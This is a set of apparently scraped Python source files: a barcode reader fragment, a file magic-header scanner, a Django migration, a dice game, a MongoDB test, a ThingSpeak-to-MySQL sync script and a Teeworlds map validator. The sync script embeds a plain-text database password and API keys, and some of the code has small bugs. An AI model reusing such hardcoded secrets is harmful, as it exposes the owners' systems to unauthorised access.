self.bar\n\n cv2.imshow('img', self.img)\n\n self.key = cv2.waitKey(1)\n if self.key == ord('q'):\n break\n elif self.key == ord('s'):\n self.i += 1\n cv2.imwrite('c_%03d.jpg' % self.i, self.img) \n \n\n \n\n self.cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n import sys\n barcode = Baread()\n barcode.baread()\n","sub_path":"UI_Test/barcode.py","file_name":"barcode.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"35341493","text":"#Python version 3.4.3\r\n#By: Groep 4 - Rick van Gorp, Nursize Bilen, Joeri van Grimbergen\r\n\r\nimport re\r\nimport binascii\r\nimport os\r\nimport sys\r\n\r\nwith open(\"ALLheaders.txt\", \"r\") as f:\r\n arrHeaders = f.read().splitlines()\r\n \r\nfor i in range(0,len(arrHeaders)):\r\n arrHeaders[i] = binascii.unhexlify(arrHeaders[i])\r\n\r\nprint(\"Database with known Magic Values loaded:\\n\" + str(arrHeaders))\r\n\r\narrFiles = []\r\n\r\nif len(sys.argv) > 1:\r\n for i in range(1,len(sys.argv)):\r\n arrFiles.append(str(sys.argv[i]))\r\nelse:\r\n arrFiles.append(str(input(\"\\nPlease input a valid filename:\\n\")))\r\n\r\n\r\nfor i in range(0,len(arrFiles)):\r\n with open(arrFiles[i], \"rb\") as file:\r\n intLen = 0\r\n arrOutPutData = []\r\n while intLen < os.path.getsize(arrFiles[i]):\r\n content = file.read(16384) #Block = 16384 bytes\r\n intLen = intLen + 16384\r\n for k in range(0,len(arrHeaders)):\r\n for m in re.finditer(re.compile(re.escape(arrHeaders[k])), content):\r\n arrOutPutData.append([hex(m.start()+intLen-16384),arrHeaders[k]])\r\n print(\"\\n\" + hex(m.start()+intLen-16384))\r\n print(arrHeaders[k])\r\n file.close()\r\n strOutputFile = \"Results - \" + arrFiles[i] + \".txt\"\r\n with open(strOutputFile, \"w\") as fOutPut:\r\n fOutPut.write(\"Value\\tLocation\\n\")\r\n for j in range(0,len(arrOutPutData)):\r\n fOutPut.write(str(arrOutPutData[j][1]) + 
\"\\t\" + str(arrOutPutData[j][0]) + \"\\n\")\r\n \r\n","sub_path":"exercises/week6/Groep-4/scripts/HeaderFinder.py","file_name":"HeaderFinder.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"1627752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Brigade',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.CharField(max_length=255, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('city', models.CharField(max_length=255)),\n ('latitude', models.FloatField(null=True, blank=True)),\n ('longitude', models.FloatField(null=True, blank=True)),\n ('started_on', models.DateField(null=True, blank=True)),\n ('website', models.URLField(max_length=1000)),\n ('type', models.CharField(max_length=255)),\n ('events_url', models.URLField(max_length=1000)),\n ('rss', models.URLField(max_length=1000)),\n ],\n options={\n 'db_table': 'brigade',\n },\n ),\n migrations.CreateModel(\n name='GitHubRepository',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('language', models.CharField(max_length=255, null=True, blank=True)),\n ('homepage', models.URLField(max_length=1000, null=True, blank=True)),\n ('stargazers_count', models.IntegerField()),\n ('watchers_count', models.IntegerField()),\n ('forks_count', models.IntegerField()),\n ('open_issues', models.IntegerField()),\n ('created_at', models.DateTimeField()),\n ],\n options={\n 'db_table': 'github_repository',\n },\n ),\n migrations.CreateModel(\n name='GitHubRepositoryContributor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('contributions', models.PositiveIntegerField()),\n ],\n options={\n 'db_table': 'github_repo_contributors',\n },\n ),\n migrations.CreateModel(\n name='GitHubUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=255)),\n ('avatar_url', models.CharField(max_length=255, null=True, blank=True)),\n ],\n options={\n 'db_table': 'github_user',\n },\n ),\n migrations.CreateModel(\n name='MeetupEvent',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.CharField(max_length=255, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('venue_name', models.CharField(max_length=255, null=True, blank=True)),\n ('group_name', models.CharField(max_length=255)),\n ('event_url', models.URLField(max_length=1000)),\n ('start_time', models.DateTimeField()),\n ('end_time', 
models.DateTimeField(null=True, blank=True)),\n ('yes_rsvp_count', models.PositiveIntegerField(default=0)),\n ('maybe_rsvp_count', models.PositiveIntegerField(default=0)),\n ('waitlist_count', models.PositiveIntegerField(default=0)),\n ('headcount', models.PositiveIntegerField(default=0)),\n ('created_at', models.DateTimeField()),\n ('brigade', models.ForeignKey(to='api.Brigade')),\n ],\n options={\n 'db_table': 'meetup_event',\n },\n ),\n migrations.CreateModel(\n name='MeetupGroup',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.CharField(max_length=255, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('organizer_name', models.CharField(max_length=255)),\n ('topics', models.TextField(null=True, blank=True)),\n ('rating', models.FloatField(null=True, blank=True)),\n ('members', models.PositiveIntegerField()),\n ('brigade', models.ForeignKey(to='api.Brigade')),\n ],\n options={\n 'db_table': 'meetup_group',\n },\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ('updated_on', models.DateTimeField(auto_now=True)),\n ('id', models.PositiveIntegerField(serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField(null=True, blank=True)),\n ('link_url', models.URLField(max_length=1000, null=True, blank=True)),\n ('code_url', models.URLField(max_length=1000, null=True, blank=True)),\n ('status', models.CharField(max_length=255, null=True, blank=True)),\n ('tags', models.TextField(null=True, blank=True)),\n ('organization_name', models.CharField(max_length=255)),\n ('last_updated', models.DateTimeField(null=True, blank=True)),\n ('brigade', models.ForeignKey(to='api.Brigade')),\n ('github_repository', models.ForeignKey(blank=True, to='api.GitHubRepository', null=True)),\n ],\n options={\n 'db_table': 'project',\n },\n ),\n migrations.AddField(\n model_name='githubrepositorycontributor',\n name='contributor',\n field=models.ForeignKey(to='api.GitHubUser'),\n ),\n migrations.AddField(\n model_name='githubrepositorycontributor',\n name='repository',\n field=models.ForeignKey(to='api.GitHubRepository'),\n ),\n migrations.AddField(\n model_name='githubrepository',\n name='contributors',\n field=models.ManyToManyField(to='api.GitHubUser', through='api.GitHubRepositoryContributor'),\n ),\n migrations.AddField(\n model_name='githubrepository',\n name='owner',\n field=models.ForeignKey(related_name='my_repos', to='api.GitHubUser'),\n ),\n ]\n","sub_path":"api/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"132042779","text":"import random\ncounter=0\nwhile True:\n input(\"Hit enter to roll the dice \")\n a=random.randint(1,6)\n if(a==6):\n print('you hit six')\n counter=counter+1\n print('You have hit a six in your',counter,'attempt.')\n break\n elif(a!=6):\n print('Hard luck, no six. 
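In the dice game this record contains, the `print('You have hit a six...')` placed after `continue` is unreachable, and the loop's counter bookkeeping is split across branches. A hypothetical rewrite of the same roll-until-six loop without the dead code:

```python
# Sketch: the same game loop, counting every roll as an attempt; in the
# original, the print after `continue` can never execute.
import random

attempts = 0
while True:
    input("Hit enter to roll the dice ")
    attempts += 1
    roll = random.randint(1, 6)
    if roll == 6:
        print("You hit a six on attempt", attempts)
        break
    print("Hard luck, no six. You got", roll)
    if input("Do you want to continue yes/no?: ").lower() != "yes":
        break
```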
You got',a,'.',end=\" \")\n yesorno=input('Do you want to continue yes/no?: ')\n if(yesorno.lower()=='yes'):\n counter=counter+1\n continue\n print('You have hit a six in your',counter,'attempt.')\n elif(yesorno.lower()=='no'):\n exit()\n else:\n print('Wrong input')\n exit()\n","sub_path":"rolling_the_dice.py","file_name":"rolling_the_dice.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5171731","text":"from pymongo import MongoClient\r\n\r\nMONGO_ADDRESS = '192.168.1.231'\r\nMONGO_PORT = 27017\r\n\r\n\r\nclass Database(object):\r\n def __init__(self, address=MONGO_ADDRESS, port=MONGO_PORT):\r\n self.conn = MongoClient(host=address, port=port, serverSelectionTimeoutMS=3000000)\r\n self.db = self.conn[\"lingying-db\"]\r\n res = self.db[\"pdl-coll\"].find({'email':'jack@eckhausfleet.com'})\r\n print(list(res))\r\nd = Database()\r\n# # l = ['a','b']\r\n# # for index in range(len(l)):\r\n# # print ('当前水果 :', l[index])\r\n#\r\n# res = [\r\n# {\r\n# \"_id\": \"5\",\r\n# \"email\": \"x@.com\",\r\n# \"tel\": \"\",\r\n# \"db_type\": \"mongo\",\r\n# \"name\": \"tom mahoney\"\r\n# },\r\n# {\r\n# \"_id\": \"6\",\r\n# \"email\": \"x@.com\",\r\n# \"company_name\": \"james c. gallo\",\r\n# \"title\": \"Manager\",\r\n# \"tel\":\"\"\r\n# },\r\n# {\r\n# \"_id\": \"1\",\r\n# \"email\": \"hoo.com\",\r\n# \"company_name\": \"Ymca\",\r\n# \"fax\": 8168108899,\r\n# \"tel\": \"\",\r\n#\r\n# },\r\n# {\r\n# \"_id\": \"2\",\r\n# \"email\": \"hoo.com\",\r\n# \"city\": \"kansas city\",\r\n# \"state\": \"mo\",\r\n# \"tel\": \"\",\r\n# },\r\n# {\r\n# \"_id\": \"6\",\r\n# \"email\": \"x@.com\",\r\n# \"company_name\": \"james c. gallo\",\r\n# \"title\": \"Manager\",\r\n# \"tel\": \"fs\"\r\n# },\r\n# ]\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# def concat(a, b):\r\n# _res = []\r\n# if isinstance(a, list):\r\n# _res.extend(a)\r\n# else:\r\n# _res.append(a)\r\n# if isinstance(b, list):\r\n# _res.extend(b)\r\n# else:\r\n# _res.append(b)\r\n# _res = set(_res)\r\n# _res = list(_res)\r\n# return _res\r\n#\r\n#\r\n# def merge_data(dict1, dict2):\r\n# print(\"我要合并\",dict1,dict2)\r\n# merge_one = {}\r\n# for k1, v1 in dict1.items():\r\n# for k2, v2 in dict2.items():\r\n# if k1 == k2:\r\n# merge_one[k1] = concat(v1, v2)\r\n# if k1 not in dict2:\r\n# merge_one[k1] = v1\r\n# for k2, v2 in dict2.items():\r\n# if k2 not in dict1.keys():\r\n# merge_one[k2] = v2\r\n# print(\"合并后\",merge_one)\r\n# return merge_one\r\n#\r\n#\r\n# def merge_all(li, res):\r\n# merge_dict = {}\r\n# print(\"li\",li)\r\n# for i in li:\r\n# print(\"i\",i)\r\n# merge_dict = merge_data(merge_dict, res[i])\r\n#\r\n# return merge_dict\r\n# def array_dels(n_d_li,li):\r\n# a_index = [i for i in range(len(li))]\r\n# a_index = set(a_index)\r\n# b_index = set(n_d_li)\r\n# index = list(a_index - b_index)\r\n# _res = [li[i] for i in index]\r\n# return _res\r\n# def clean_data(res):\r\n#\r\n# e_list = []\r\n# t_list = []\r\n#\r\n# for index in range(len(res)):\r\n# one = res[index]\r\n# email = one.get(\"email\")\r\n# # 如果一条数据有email属性\r\n# if email:\r\n# flag = False\r\n# for i in range(len(e_list)):\r\n# # 有就加入所在序号,没有重新添加\r\n# if email == e_list[i][\"value\"]:\r\n# e_list[i][\"position\"].append(index)\r\n# flag = True\r\n# if not flag:\r\n# e_list.append({\"position\": [index, ], \"value\": email})\r\n# print(e_list)\r\n#\r\n# mer_list = []\r\n# need_del = []\r\n# for need_mer in e_list:\r\n# mer_dic = merge_all(need_mer[\"position\"],res)\r\n# mer_list.append(mer_dic)\r\n# 
need_del.extend(need_mer[\"position\"])\r\n#\r\n# res = array_dels(need_del,res)\r\n#\r\n# res.extend(mer_list)\r\n# return res\r\n#\r\n# dic = [\r\n# {\r\n#\r\n# },\r\n# {\"a\": 1,\r\n# \"b\": 2,\r\n# \"c\": 5\r\n# },\r\n# {\"a\": 1,\r\n# \"b\": 3,\r\n# \"d\": 89\r\n# },\r\n# {\"a\": 1,\r\n# \"b\": 3,\r\n# \"d\": \"fsfs\"\r\n# }\r\n# ]\r\n# # print(merge_all([0, 1, 3], dic))\r\n# # print(\"ds\", merge_data(dic[0], dic[1]))\r\n# print(clean_data(res))\r\n","sub_path":"api/test/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"202656537","text":"#!/usr/bin/python3\nimport mysql.connector, urllib.request, json, time, datetime\n\n\"\"\"\n String za spajanje na MySQL bazu podataka.\n\"\"\"\ntry:\n conn = mysql.connector.connect(\n host='portmap.io',\n port='61974',\n database='smartcity',\n user='test',\n password='123');\n print(\"Povezivanje na bazu podataka uspjesno.\\n\")\nexcept EnvironmentError as e:\n print(\"Povezivanje neuspjelo. Provjerite podatke.\\n\")\n\n \n\"\"\"\n Povlacenje JSON-a sa ThingSpeak servera.\n urllib.request.urlopen salje http request stranici, i zatim json.loads pretvara json u python objekte.\n\"\"\"\n\ncursor = conn.cursor()\n\nwith urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696.json?api_key=E5V4C2KMUN5S4BWM\") as url:\n channelData = json.loads(url.read().decode())\n\njsonLastID = channelData['last_entry_id']\n\nwith urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696/feeds.json?results=\" + str(jsonLastID) + \"api_key=E5V4C2KMUN5S4BWM\") as url:\n data = json.loads(url.read().decode())\n\n\"\"\"\n Ispred metode Entry su definirane liste za inicijalni unos podataka.\n Metoda Entry izvrsava inicijalni unos podataka u bazu.\n Upisuje SVE podatke sa JSONa u bazu.\n for u pythonu funkcionira kao foreach u C# sto znaci:\n npr. 
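Two things stand out in the ThingSpeak importer above: the second request concatenates `...results=N` and `api_key=...` without a separating `&`, so the key is glued onto the count, and each field is later collected into its own module-level list. A sketch of a small fetch helper plus a single list of row tuples, using the same channel URL and field layout as the script:

```python
# Sketch: one helper for the repeated urlopen/json.loads pattern, and the
# nine parallel lists replaced by a list of row tuples.
import json
import urllib.request

def fetch_feed(url):
    with urllib.request.urlopen(url) as resp:
        return json.loads(resp.read().decode())

feed = fetch_feed("https://api.thingspeak.com/channels/196696/feeds.json"
                  "?api_key=E5V4C2KMUN5S4BWM&results=1")
rows = [(f['entry_id'], f['field1'], f['field2'], f['field3'], f['field4'],
         f['field5'], f['field6'], f['field7'], f['created_at'])
        for f in feed['feeds']]
```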
Svaki entry_id koji se nalazi u dijelu json-a pod ['feeds'] se stavlja u listu listEntryID .\n\"\"\"\n \nlistEntryID = []\nlistID = []\nlistTemperaturaZraka = []\nlistVlagaZraka = []\nlistKvalitetaZraka = []\nlistRazinaCO2 = []\nlistRazinaCO = []\nlistDetekcijaOpasnihPlinova = []\nlistCreatedAt = []\n\ndef Entry():\n for entryID in data['feeds']:\n listEntryID.append(entryID['entry_id'])\n\n for ID in data['feeds']:\n listID.append(ID['field1'])\n\n for TemperaturaZraka in data['feeds']:\n listTemperaturaZraka.append(TemperaturaZraka['field2'])\n\n for VlagaZraka in data['feeds']:\n listVlagaZraka.append(VlagaZraka['field3'])\n\n for KvalitetaZraka in data['feeds']:\n listKvalitetaZraka.append(KvalitetaZraka['field4'])\n\n for RazinaCO2 in data['feeds']:\n listRazinaCO2.append(RazinaCO2['field5'])\n\n for RazinaCO in data['feeds']:\n listRazinaCO.append(RazinaCO['field6'])\n\n for DetekcijaOpasnihPlinova in data['feeds']:\n listDetekcijaOpasnihPlinova.append(DetekcijaOpasnihPlinova['field7'])\n\n for CreatedAt in data['feeds']:\n listCreatedAt.append(CreatedAt['created_at'])\n\n for i in range(0, jsonLastID):\n insert = \"INSERT INTO meteoroloskaStanica VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(insert, (listEntryID[i], listID[i], listTemperaturaZraka[i], listVlagaZraka[i], listKvalitetaZraka[i], listRazinaCO2[i], listRazinaCO[i], listDetekcijaOpasnihPlinova[i], listCreatedAt[i]))\n\n print(\"Podaci upisani u bazu podataka.\\n\")\n conn.commit()\n\n\n\"\"\"\n Metoda provjerava ako je baza podataka potpuno prazna.\n Ako je, poziva metodu Entry() koja upisuje 100 podataka (maksimum for petlje je 100) u bazu.\n Ako baza ima podatke, metoda ne radi nista i program se nastavlja.\n\"\"\"\n\ndef checkIfDatabaseIsEmpty():\n cursor.execute(\"SELECT * FROM meteoroloskaStanica\")\n cursor.fetchall()\n brojPodatka = cursor.rowcount\n \n if (brojPodatka != 0):\n print(\"Baza ima podatke.\\n\")\n elif (brojPodatka == 0):\n print(\"Baza je prazna. Dodavanje podataka...\")\n Entry()\n\ncheckIfDatabaseIsEmpty()\n\n\"\"\"\n Ispred metode updateDatabase definirane su liste za azuriranje baze podataka.\n !!! updateDatabase() je pozvan tek u while loopu na kraju koda !!!\n Metoda updateDatabase() azurira bazu podataka:\n 1. Posalje se novi request za json sa thingspeak-a, ali ovaj put samo za zadnjim unesenim podatkom (zato je &results=1 u URL-u)\n 2. Podaci se stavljaju u updated liste i zatim na isti nacin kao i kod Entry() metode upisuju u bazu podataka\n 3. Nakon toga se liste ociste i ostanu prazne tako da su spremne za novi update. To se radi naredbom npr. del updateEntryID[:]\n 4. Postavlja se updatedLastEntryID na najnoviji last_entry_id. 
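The update logic described in this docstring reduces to: remember the last seen `last_entry_id`, act when it changes, sleep, repeat. The single-element lists (`listLastEntryID`, `updateLastEntryID`) can be plain variables; a sketch of the same polling idiom, reusing the hypothetical `fetch_feed` helper sketched earlier:

```python
# Sketch of the change-detection loop; on_new_entry is whatever should run
# when a new entry appears on the channel.
import time

def poll(channel_url, on_new_entry, delay=5):
    last_seen = None
    while True:
        latest = fetch_feed(channel_url)['last_entry_id']
        if last_seen is not None and latest != last_seen:
            on_new_entry(latest)
        last_seen = latest
        time.sleep(delay)
```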
To je polje u jsonu koje nam govori koje je id od zadnjeg upisanog podatka.\n\"\"\"\n\nupdateEntryID = []\nupdateID = []\nupdateTemperaturaZraka = []\nupdateVlagaZraka = []\nupdateKvalitetaZraka = []\nupdateRazinaCO2 = []\nupdateRazinaCO = []\nupdateDetekcijaOpasnihPlinova = []\nupdateCreatedAt = []\n\ndef updateDatabase():\n with urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696/feeds.json?api_key=E5V4C2KMUN5S4BWM&results=1\") as url:\n updateData = json.loads(url.read().decode())\n \n for newEntryID in updateData['feeds']:\n updateEntryID.append(newEntryID['entry_id'])\n \n for newID in updateData['feeds']:\n updateID.append(newID['field1'])\n\n for newTemperaturaZraka in updateData['feeds']:\n updateTemperaturaZraka.append(newTemperaturaZraka['field2'])\n\n for newVlagaZraka in updateData['feeds']:\n updateVlagaZraka.append(newVlagaZraka['field3'])\n\n for newKvalitetaZraka in updateData['feeds']:\n updateKvalitetaZraka.append(newKvalitetaZraka['field4'])\n\n for newRazinaCO2 in updateData['feeds']:\n updateRazinaCO2.append(newRazinaCO2['field5'])\n\n for newRazinaCO in updateData['feeds']:\n updateRazinaCO.append(newRazinaCO['field6'])\n\n for newDetekcijaOpasnihPlinova in updateData['feeds']:\n updateDetekcijaOpasnihPlinova.append(newDetekcijaOpasnihPlinova['field7'])\n\n for newCreatedAt in updateData['feeds']:\n updateCreatedAt.append(newCreatedAt['created_at'])\n\n for i in range(0, 1):\n insert = \"INSERT INTO meteoroloskaStanica VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(insert, (updateEntryID[i], updateID[i], updateTemperaturaZraka[i], updateVlagaZraka[i], updateKvalitetaZraka[i], updateRazinaCO2[i], updateRazinaCO[i], updateDetekcijaOpasnihPlinova[i], updateCreatedAt[i]))\n\n print(\"Podaci upisani u bazu podataka.\")\n conn.commit()\n \n del updateEntryID[:]\n del updateID[:]\n del updateTemperaturaZraka[:]\n del updateVlagaZraka[:]\n del updateKvalitetaZraka[:]\n del updateRazinaCO2[:]\n del updateRazinaCO[:]\n del updateDetekcijaOpasnihPlinova[:]\n del updateCreatedAt[:]\n \n with urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696.json?api_key=E5V4C2KMUN5S4BWM\") as url:\n channelDataUpdate2 = json.loads(url.read().decode())\n \n del updateLastEntryID[:]\n updateLastEntryID.append(channelDataUpdate2['last_entry_id'])\n\n\n\"\"\"\n while True loop preko metoda checkForUpdate() stalno provjerava je li se promjenio 'last_entry_id' tako da:\n 1. Stalno se provjerava 'last_entry_id' naredbom:\n listLastEntryID.append(channelData['last_entry_id'])\n 2. U if petlji se usporeduje sa updatedLastEntryID koji je IZVAN while petlje i metode postavljen na isto:\n updateLastEntryID.append(channelData['last_entry_id'])\n\n Ako su obije varijable iste, baza podataka se ne mijenja i ispisuje se poruka da je azurirana.\n U suprotnom, baza se azurira i zatim se poziva metoda updateDatabase() koja na svom kraju\n postavlja novi updatedLastEntryID. 
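`updateDatabase` above will die with a duplicate-key error if the script restarts and re-inserts an `entry_id` that is already in the table (assuming `entry_id` is the primary key, which the initial-load logic implies; the schema itself is not shown). MySQL's upsert form makes the insert safe to repeat; a hedged sketch, with `cursor`, `conn` and `rows` as in the surrounding script and earlier sketch:

```python
# Sketch only: 'entry_id' as the column name is an assumption. The
# ON DUPLICATE KEY clause turns a repeated insert into a no-op.
query = ("INSERT INTO meteoroloskaStanica VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s) "
         "ON DUPLICATE KEY UPDATE entry_id = entry_id")
cursor.executemany(query, rows)
conn.commit()
```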
Tako LastEntryID i updateLastEntryID opet postaju isti dok se ne pojavi\n novi last_entry_id podatak na jsonu.\n\n time.sleep naredba vrti while loop svakih 5 sekundi.\n\"\"\"\n\ndelay = 5\n\nlistLastEntryID = []\n\nupdateLastEntryID = []\nupdateLastEntryID.append(channelData['last_entry_id'])\n\ndef checkForUpdate():\n with urllib.request.urlopen(\"https://api.thingspeak.com/channels/196696.json?api_key=E5V4C2KMUN5S4BWM\") as url:\n channelDataUpdate = json.loads(url.read().decode())\n \n listLastEntryID.append(channelDataUpdate['last_entry_id'])\n \n dt = datetime.datetime.now()\n \n if(listLastEntryID == updateLastEntryID):\n print(\"Baza je azurirana.\")\n print(dt)\n print(\"\\n\")\n del listLastEntryID[:]\n elif(listLastEntryID != updateLastEntryID):\n print(\"\\nAzuriranje baze podataka...\")\n updateDatabase()\n print(\"Baza podataka azurirana.\")\n print(dt)\n print(\"\\n\")\n del listLastEntryID[:]\n \nwhile True:\n print(\"updatedLastEntryID = \" + str(updateLastEntryID))\n \n checkForUpdate();\n \n time.sleep(delay)\n \nconn.close()","sub_path":"serverSkripte/JSON_To_MySQL_MeteoroloskaStanica.py","file_name":"JSON_To_MySQL_MeteoroloskaStanica.py","file_ext":"py","file_size_in_byte":8255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171177147","text":"import importlib\n\n\ndef assert_dep(name):\n assert importlib.util.find_spec(name), \"需要安装 %s\" % name\n\n\ndef login():\n import inquirer\n import 手机登录, 二维码登录\n\n methods = {\"手机登录\": 手机登录, \"二维码登录\": 二维码登录}\n assert methods[\n inquirer.prompt([inquirer.List(\"method\", message=\"登陆方法\", choices=methods)])[\n \"method\"\n ]\n ].login(), \"登录失败\"\n from pyncm import GetCurrentSession\n\n print(\n \"已登录\",\n GetCurrentSession().nickname,\n \"曾用 IP:\",\n GetCurrentSession().lastIP,\n \"用户 ID:\",\n GetCurrentSession().uid,\n )\n return True\n\n\nassert_dep(\"pyncm\")\nassert_dep(\"inquirer\")\nfrom pyncm import __version__\n\nprint(\"PyNCM %s\" % __version__)\n","sub_path":"demos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"110859488","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport argparse\nimport subprocess\nimport re\n\nsys.path.append('/srv/tw/race/tml')\n\nfrom tml.tml import Teemap\nfrom tml.constants import TILEINDEX, TELEINDEX, SPEEDUPINDEX, EXTERNAL_MAPRES\n\nimport tw\n\n\n# Exceptions:\n# - run_300_from_scratch uses tunes\n# - run_crossover uses weapon tele\n# - ctf1-7 not checked, we can't change standard maps\n\n\nRACE_SETTINGS = set(['sv_health_and_ammo 1', 'sv_kill_grenades 1'])\nNOHARM_SETTINGS = set(['sv_delete_grenades_after_death 0', 'sv_infinite_ammo 1', \\\n 'sv_pickup_respawn -1', 'sv_regen 0', 'sv_rocket_jump_damage 0', \\\n 'sv_strip 0', 'sv_teleport 0', 'sv_teleport_grenade 0', 'sv_teleport_kill 0', \\\n 'sv_teleport_vel_reset 0', 'sv_teleport 1', 'sv_no_items 0', 'tune_zone .*'])\n\nENTITIES_OFF_SIGN = [190, 191]\nFRONT_TILES = list(map(TILEINDEX.get, ['air', 'death', 'start', 'finish', \\\n 'armor', 'health', 'shotgun', 'grenade', 'ninja', 'rifle', \\\n 'stopper', 'stopper_twoway', 'stopper_allway'])) + ENTITIES_OFF_SIGN\nGAME_TILES = list(map(TILEINDEX.get, ['solid', 'nohook'])) + ENTITIES_OFF_SIGN\nNOHARM_TILES = [29, 30, 31, 68, 93, 94, 134, 176]\n\nTELE_TILES = list(map(TELEINDEX.get, ['air', 'from', 'from_evil', 'to', 'cp', \\\n 'cp_from', 'cp_from_evil', 'cp_to']))\n\n\ndef err(msg):\n global 
success\n if show_error:\n print(\"Error: {}: {}\".format(mapname, msg))\n success = False\n\ndef crit(msg):\n global success\n print(\"Critical: {}: {}\".format(mapname, msg))\n success = False\n\ndef load_map():\n try:\n t = Teemap(mappath)\n return t\n except Exception as err:\n crit(err)\n\ndef validate_settings(t):\n if not t.info or not t.info.settings:\n return\n settings = set([s.decode() for s in t.info.settings])\n if not settings or settings == set(['']):\n return\n if mapname == 'run_300_from_scratch':\n return\n if gametype == 'race' and all(any(re.match(r, s) for r in RACE_SETTINGS) for s in settings):\n return\n if all(any(re.match(r, s) for r in NOHARM_SETTINGS) for s in settings):\n err(\"Invalid server settings\")\n else:\n crit(\"Invalid server settings {}\".format(settings - NOHARM_SETTINGS))\n\ndef validate_mapres(t):\n for image in t.images:\n if image.external and image.name not in EXTERNAL_MAPRES:\n err(\"Mapre '{}' not embedded\".format(image.name))\n\ndef validate_layers(t):\n if t.switchlayer:\n crit(\"Switch layer forbidden\")\n if t.tunelayer and mapname != 'run_300_from_scratch':\n err(\"Tune layer forbidden\")\n\ndef validate_gametiles(t):\n spawn_count = 0\n spawn_red_count = 0\n spawn_blue_count = 0\n flag_red_count = 0\n flag_blue_count = 0\n\n warned = []\n layers = [t.gamelayer]\n if t.frontlayer:\n layers.append(t.frontlayer)\n for layer in layers:\n for tile in layer.gametiles:\n if tile.index in FRONT_TILES:\n continue\n if layer.is_gamelayer and tile.index in GAME_TILES:\n continue\n if TILEINDEX['cp_first'] <= tile.index <= TILEINDEX['cp_last']:\n continue\n\n if tile.index == TILEINDEX['spawn']:\n spawn_count += 1\n continue\n elif tile.index == TILEINDEX['spawn_red']:\n spawn_red_count += 1\n continue\n elif tile.index == TILEINDEX['spawn_blue']:\n spawn_blue_count += 1\n continue\n elif tile.index == TILEINDEX['flagstand_red']:\n flag_red_count += 1\n continue\n elif tile.index == TILEINDEX['flagstand_blue']:\n flag_blue_count += 1\n continue\n\n if tile.index not in warned:\n layer_name = 'gamelayer' if layer.is_gamelayer else 'frontlayer'\n if tile.index in NOHARM_TILES:\n err(\"Invalid index {} in {}\".format(tile.index, layer_name))\n else:\n crit(\"Invalid index {} in {}\".format(tile.index, layer_name))\n warned.append(tile.index)\n\n if gametype == 'race' and (spawn_count == 0 or spawn_red_count != 0 or spawn_blue_count != 0 or\n flag_red_count != 0 or flag_blue_count != 0):\n crit(\"Invalid spawn or flagstand count\")\n if gametype == 'race' and spawn_count > 1:\n err(\"More than one spawns\")\n if gametype == 'fastcap' and (spawn_count != 0 or spawn_red_count == 0 or spawn_blue_count == 0 or\n flag_red_count != 1 or flag_blue_count != 1):\n crit(\"Invalid spawn or flagstand count\")\n\ndef validate_teletiles(t):\n if not t.telelayer:\n return\n warned = []\n for tile in t.telelayer.gametiles:\n if tile.index in TELE_TILES:\n continue\n if mapname == 'run_crossover' and tile.index == TELEINDEX['weapon']:\n continue\n if tile.index not in warned:\n crit(\"Invalid index {} in telelayer\".format(tile.index))\n warned.append(tile.index)\n\ndef validate_speeduptiles(t):\n if not t.speeduplayer:\n return\n for tile in t.speeduplayer.gametiles:\n if tile.index not in [0, SPEEDUPINDEX]:\n err(\"Invalid index in 